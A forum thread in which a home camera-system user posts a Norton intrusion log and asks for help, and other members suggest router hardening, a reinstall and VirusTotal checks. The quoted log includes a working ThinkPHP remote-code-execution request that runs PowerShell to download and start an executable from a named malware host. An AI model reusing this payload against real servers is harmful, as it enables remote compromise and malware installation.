Intrusion Attempt - Firewall question.

John4333

n3wb
Joined
Aug 25, 2015
Messages
17
Reaction score
0
I run Blue Iris on my home computer to monitor 4 home cameras. The system is windows 10 and we access information remotely on both an IOS and Android device. I use a Google Mesh system for my router.

Lately I have seen increasing intrusion attempts, which appear to be stopped by my Norton Anti-Virus program, which incorporates a firewall. I also run Malwarebytes premium on the computer.

The following is what Norton lists as an Intrusion Attempt. I don't understand it, as it says it originates from my computer. I've obscured my IP information and it is bolded as my computer name, an my internal and external IP addresses.

Can anyone help explain what is happening, and are there other steps I should take to secure my system?

Thanks in advance,
John

Category: Intrusion Prevention
Date & Time,Risk,Activity,Status,Recommended Action,IPS Alert Name,Default Action,Action Taken,Attacking Computer,Attacker URL,Destination Address,Source Address,Traffic Description
3/26/2019 1:07:05 AM,High,An intrusion attempt by MYCOMPUTER was blocked.,Blocked,No Action Required,System Infected: Downloader Download 5,No Action Required,No Action Required,"MYCOMPUTER (MyInternal IP, 8081)","MyExternal IP/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/ohjjiyvtnayjtec27467.exe');start C:/Windows/temp/ohjjiyvtnayjtec27467.exe","113.248.157.129, 11839",MYCOMPUTER (MyInternal IP),"TCP, Port 8081"
Network traffic from <b>MyExternal IP/public/index.php?s=index/think\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=system&amp;vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile(&apos;http://fid.hognoob.se/download.exe&apos;,&apos;C:/Windows/temp/ohjjiyvtnayjtec27467.exe&apos;);start C:/Windows/temp/ohjjiyvtnayjtec27467.exe</b> matches the signature of a known attack. The attack was resulted from \DEVICE\HARDDISKVOLUME6\PROGRAM FILES\BLUE IRIS 4\BLUEIRIS.EXE. To stop being notified for this type of traffic, in the <b>Actions</b> panel, click <b>Stop Notifying Me</b>.
 

SouthernYankee

IPCT Contributor
Joined
Feb 15, 2018
Messages
5,170
Reaction score
5,320
Location
Houston Tx
If set correctly you should not be getting internal attacks.
What is your internet router, make and model >?
What ports are open on your router ?
Do you have uPNP enabled on the router, cameras ?
Do you access blue iris external from your home network ? If so how , be very detailed .
 

catcamstar

Known around here
Joined
Jan 28, 2018
Messages
1,659
Reaction score
1,193
Since 10/3/2019, that particular site (hognoob.se) has served malware attacks (source: URLhaus | http://fid.hognoob.se/download.exe)

In addition to what @SouthernYankee wrote to secure your router (disable port forwards/uPNP etc): go into lockdown mode. If I was you and saw such "attacks": I'd format the pc right away, reinstall windows 10, update all, install BI and do NOT (ab)use that pc for anything else. Do not install grey zone games/software nor watch nature documentaries.

Hope this helps!
CC
 

davej

Getting the hang of it
Joined
Apr 25, 2014
Messages
279
Reaction score
69
You might consider taking the files that are mentioned in the report and uploading them to Virustotal.
VirusTotal
 
Top